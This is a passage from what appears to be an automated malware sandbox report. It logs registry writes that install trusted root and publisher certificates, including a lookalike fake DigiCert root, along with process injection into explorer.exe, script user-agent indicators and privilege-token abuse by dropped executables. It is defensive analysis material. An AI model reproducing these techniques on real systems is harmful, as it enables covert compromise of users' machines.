0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672\Blob = 190000000100000010000000481045cc2473f042e4cffff6c48dc01a0f00000001000000200000002c6f090647d8ef6abde2341fc6b22b4f98ab7f9eff5eb415e61b888a9502496b030000000100000014000000399783aa164437bdb5a30dd71f01b94ea51896721400000001000000140000009800469f6381daad6d592c0e4a1a8b97efd733a5040000000100000010000000fd764328d91dda5134d5cd7951d5077e20000000010000007d02000030820279308201e2a00302010202085943dc7b47334426300d06092a864886f70d01010b050030623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b3009060355040613025553301e170d3139303832333232343132315a170d3233303832323232343132315a30623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100f1f42250304984cb1972561104fb10f441bddf42adf6db15f5b9d381c181fbb068e6584e0547e565b8baaa2d1f248a59c3e1e61c28ad7c95fa55b7189a90d5c585bb8cd61a019220c31295f5700da608da4c13c552273199921ff33f0642c9c66f199a5d5c35b65f88a102b07f6cfdcdd7449fea4d3aca711cf06ca6df1b68250203010001a3383036300f0603551d130101ff040530030101ff30230603551d11041c301a821844693667694365727420476c6f62616c20526f6f74204732300d06092a864886f70d01010b0500038181003016228e8053b913f4a80225212bee7e58fad36af3aa85accd51a54bf5e65b7b3586801629c504a168bf5f70cdfdaae3c7c8c2aea3512abd687b50651ca07356c23155ed8658e1ad06f3cb32f06b7257cea92f42ac0dd3761a9023834a6d082d09066ca14557a264a1acb16b57058fe11b0652849c2bccbd62c0cd0469f06838 DF29.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672 DF29.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (14).exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672 RUNDLL32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Cleaner Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Cleaner Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672\Blob = 030000000100000014000000399783aa164437bdb5a30dd71f01b94ea518967220000000010000007d02000030820279308201e2a00302010202085943dc7b47334426300d06092a864886f70d01010b050030623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b3009060355040613025553301e170d3139303832333232343132315a170d3233303832323232343132315a30623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100f1f42250304984cb1972561104fb10f441bddf42adf6db15f5b9d381c181fbb068e6584e0547e565b8baaa2d1f248a59c3e1e61c28ad7c95fa55b7189a90d5c585bb8cd61a019220c31295f5700da608da4c13c552273199921ff33f0642c9c66f199a5d5c35b65f88a102b07f6cfdcdd7449fea4d3aca711cf06ca6df1b68250203010001a3383036300f0603551d130101ff040530030101ff30230603551d11041c301a821844693667694365727420476c6f62616c20526f6f74204732300d06092a864886f70d01010b0500038181003016228e8053b913f4a80225212bee7e58fad36af3aa85accd51a54bf5e65b7b3586801629c504a168bf5f70cdfdaae3c7c8c2aea3512abd687b50651ca07356c23155ed8658e1ad06f3cb32f06b7257cea92f42ac0dd3761a9023834a6d082d09066ca14557a264a1acb16b57058fe11b0652849c2bccbd62c0cd0469f06838 RUNDLL32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672\Blob = 030000000100000014000000399783aa164437bdb5a30dd71f01b94ea518967220000000010000007d02000030820279308201e2a00302010202085943dc7b47334426300d06092a864886f70d01010b050030623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b3009060355040613025553301e170d3139303832333232343132315a170d3233303832323232343132315a30623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100f1f42250304984cb1972561104fb10f441bddf42adf6db15f5b9d381c181fbb068e6584e0547e565b8baaa2d1f248a59c3e1e61c28ad7c95fa55b7189a90d5c585bb8cd61a019220c31295f5700da608da4c13c552273199921ff33f0642c9c66f199a5d5c35b65f88a102b07f6cfdcdd7449fea4d3aca711cf06ca6df1b68250203010001a3383036300f0603551d130101ff040530030101ff30230603551d11041c301a821844693667694365727420476c6f62616c20526f6f74204732300d06092a864886f70d01010b0500038181003016228e8053b913f4a80225212bee7e58fad36af3aa85accd51a54bf5e65b7b3586801629c504a168bf5f70cdfdaae3c7c8c2aea3512abd687b50651ca07356c23155ed8658e1ad06f3cb32f06b7257cea92f42ac0dd3761a9023834a6d082d09066ca14557a264a1acb16b57058fe11b0652849c2bccbd62c0cd0469f06838 RUNDLL32.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 32 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 216 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 225 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 301 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 446 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 447 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 523 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 177 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 214 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 247 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 524 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 167 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 180 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 349 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 476 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 530 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 161 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 228 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 217 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 224 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 241 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 313 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 469 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 163 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 215 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 187 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 433 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 431 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 242 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 357 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 472 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 172 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 226 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup (14).exeMmdyuBaUmiqTtz3iycBqc_Ne.exeWerFault.exeWerFault.exepid process 3456 Setup (14).exe 3456 Setup (14).exe 4688 MmdyuBaUmiqTtz3iycBqc_Ne.exe 4688 MmdyuBaUmiqTtz3iycBqc_Ne.exe 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 4324 2824 2824 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 2824 2824 2824 2824 2824 2824 2824 2824 2824 2824 2824 2824 2824 2824 2824 2824 3688 WerFault.exe 3688 WerFault.exe 3688 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
dllhost.exepid process 2824 7676 dllhost.exe -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
MmdyuBaUmiqTtz3iycBqc_Ne.exeblor8zJ5PA17kKaIYWOn246T.exeoa49cpqZl5T5Pps5fyIxAXYu.exeMicrosoftEdgeCP.exeexplorer.exeexplorer.exeexplorer.exepid process 4688 MmdyuBaUmiqTtz3iycBqc_Ne.exe 5836 blor8zJ5PA17kKaIYWOn246T.exe 6416 oa49cpqZl5T5Pps5fyIxAXYu.exe 8772 MicrosoftEdgeCP.exe 8772 MicrosoftEdgeCP.exe 8772 MicrosoftEdgeCP.exe 8772 MicrosoftEdgeCP.exe 2824 2824 2824 2824 2824 2824 2824 2824 6464 explorer.exe 6464 explorer.exe 6464 explorer.exe 6464 explorer.exe 6464 explorer.exe 6464 explorer.exe 6464 explorer.exe 6464 explorer.exe 2824 2824 2824 2824 8948 explorer.exe 8948 explorer.exe 8948 explorer.exe 8948 explorer.exe 8948 explorer.exe 8948 explorer.exe 8948 explorer.exe 8948 explorer.exe 2824 2824 2824 2824 9564 explorer.exe 9564 explorer.exe 9564 explorer.exe 9564 explorer.exe 9564 explorer.exe 9564 explorer.exe 9564 explorer.exe 9564 explorer.exe 2824 2824 6464 explorer.exe 6464 explorer.exe 8948 explorer.exe 9564 explorer.exe 8948 explorer.exe 9564 explorer.exe 6464 explorer.exe 6464 explorer.exe 9564 explorer.exe 9564 explorer.exe 8948 explorer.exe 8948 explorer.exe 9564 explorer.exe 9564 explorer.exe 8948 explorer.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
5751915.exe4626128.exepid process 4920 5751915.exe 7492 4626128.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
SIyCPL9G7jyLe7jAVnTopx1c.exe2vjE50Tl27JNy_7vbQ35QdX4.exewHIP5ak8pb1tTUGxW5Yx1CBf.exelGWWBHm3E8UplgySvQwCR8t4.exeZ6X45YxttCTJi5IiQ4xPeFcp.exeWerFault.exeb0v0M5P14IL6HfhwtR78DYMR.exeWerFault.exePtyHRWTqRy0UITBsMkTArf_R.exe1264403.exeHqeTzHZdh1KyjcFp4aA13tvd.exeUQvCjtwlUUxmZrDhPkDuxaFf.exeWerFault.exeDXO_fwO41293rmBk4OLPHCT1.exe54axPUQyoM5gSmQFRergm7g2.exeWerFault.exe1630908.exe5504337.exetaskkill.exeaskinstall53.exedescription pid process Token: SeDebugPrivilege 2560 SIyCPL9G7jyLe7jAVnTopx1c.exe Token: SeDebugPrivilege 3316 2vjE50Tl27JNy_7vbQ35QdX4.exe Token: SeDebugPrivilege 2696 wHIP5ak8pb1tTUGxW5Yx1CBf.exe Token: SeDebugPrivilege 3460 lGWWBHm3E8UplgySvQwCR8t4.exe Token: SeDebugPrivilege 1100 Z6X45YxttCTJi5IiQ4xPeFcp.exe Token: SeRestorePrivilege 4324 Token: SeBackupPrivilege 4324 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeDebugPrivilege 4324 Token: SeDebugPrivilege 3264 WerFault.exe Token: SeDebugPrivilege 1036 b0v0M5P14IL6HfhwtR78DYMR.exe Token: SeDebugPrivilege 3688 WerFault.exe Token: SeDebugPrivilege 2800 PtyHRWTqRy0UITBsMkTArf_R.exe Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeDebugPrivilege 3272 1264403.exe Token: SeDebugPrivilege 1672 HqeTzHZdh1KyjcFp4aA13tvd.exe Token: SeDebugPrivilege 4860 UQvCjtwlUUxmZrDhPkDuxaFf.exe Token: SeDebugPrivilege 3404 WerFault.exe Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeDebugPrivilege 4840 DXO_fwO41293rmBk4OLPHCT1.exe Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeDebugPrivilege 5048 54axPUQyoM5gSmQFRergm7g2.exe Token: SeDebugPrivilege 3736 WerFault.exe Token: SeDebugPrivilege 5028 1630908.exe Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeDebugPrivilege 2056 5504337.exe Token: SeDebugPrivilege 5260 taskkill.exe Token: SeCreateTokenPrivilege 5708 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 5708 askinstall53.exe Token: SeLockMemoryPrivilege 5708 askinstall53.exe Token: SeIncreaseQuotaPrivilege 5708 askinstall53.exe Token: SeMachineAccountPrivilege 5708 askinstall53.exe Token: SeTcbPrivilege 5708 askinstall53.exe Token: SeSecurityPrivilege 5708 askinstall53.exe Token: SeTakeOwnershipPrivilege 5708 askinstall53.exe Token: SeLoadDriverPrivilege 5708 askinstall53.exe Token: SeSystemProfilePrivilege 5708 askinstall53.exe Token: SeSystemtimePrivilege 5708 askinstall53.exe Token: SeProfSingleProcessPrivilege 5708 askinstall53.exe Token: SeIncBasePriorityPrivilege 5708 askinstall53.exe Token: SeCreatePagefilePrivilege 5708 askinstall53.exe Token: SeCreatePermanentPrivilege 5708 askinstall53.exe Token: SeBackupPrivilege 5708 askinstall53.exe Token: SeRestorePrivilege 5708 askinstall53.exe Token: SeShutdownPrivilege 5708 askinstall53.exe Token: SeDebugPrivilege 5708 askinstall53.exe Token: SeAuditPrivilege 5708 askinstall53.exe Token: SeSystemEnvironmentPrivilege 5708 askinstall53.exe Token: SeChangeNotifyPrivilege 5708 askinstall53.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
